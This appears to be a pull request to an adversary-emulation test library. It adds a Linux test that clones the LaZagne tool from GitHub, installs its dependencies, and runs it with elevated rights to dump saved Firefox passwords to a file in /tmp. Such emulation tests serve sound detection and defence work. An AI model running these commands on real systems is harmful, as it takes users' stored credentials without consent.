### PR TITLE
T1555.003 Linux SH for Challenge

### DIFF
--- a/atomics/T1555.003/T1555.003.yaml
+++ b/atomics/T1555.003/T1555.003.yaml
@@ -282,3 +282,29 @@ atomic_tests:
      cat #{Out_Filepath}
     cleanup_command: |
      Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue   
+- name: LaZagne.py - Dump Credentials from Firefox Browser
+  description: Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser
+  supported_platforms:
+  - linux
+  input_arguments:
+    output_file:
+      description: This is where output for the Firefox passwords goes
+      type: String
+      default: /tmp/firefox_password.txt
+    lazagne_path:
+      description: Path you put LaZagne Github with LaZagne.py
+      type: String
+      default: /tmp/LaZagne/Linux
+  dependency_executor_name: sh
+  dependencies:
+  - description: Get Lazagne from github and install requirements
+    prereq_command: 'test -f #{lazagne_path}/laZagne.py'
+    get_prereq_command: cd /tmp; git clone https://github.com/AlessandroZ/LaZagne; cd /tmp/LaZagne/; pip install -r requirements.txt
+  - description: Needs git, python3 and some pip stuff
+    prereq_command: which git && which python3 && which pip
+    get_prereq_command: apt install git; apt install python3-pip -y; pip install pyasn1 psutil Crypto
+  executor:
+    command: 'python3 #{lazagne_path}/laZagne.py browsers -firefox >> #{output_file}'
+    cleanup_command: 'rm -R /tmp/LaZagne; rm -f #{output_file}'
+    name: sh
+    elevation_required: true


### PR DESCRIPTION
**Details:**
(For Challenge that ends May 18th 2022) and using Lazagne.py to dump Firefox creds

**Testing:**
Credential Dump on Ubuntu 20.04.4 (Desktop) LTS Focal Fossa Firefox Browser
Using SH instead of BASH

**Associated Issues:**
umm, maybe the GetPreReqs for finding git, python3, and pip things could be better.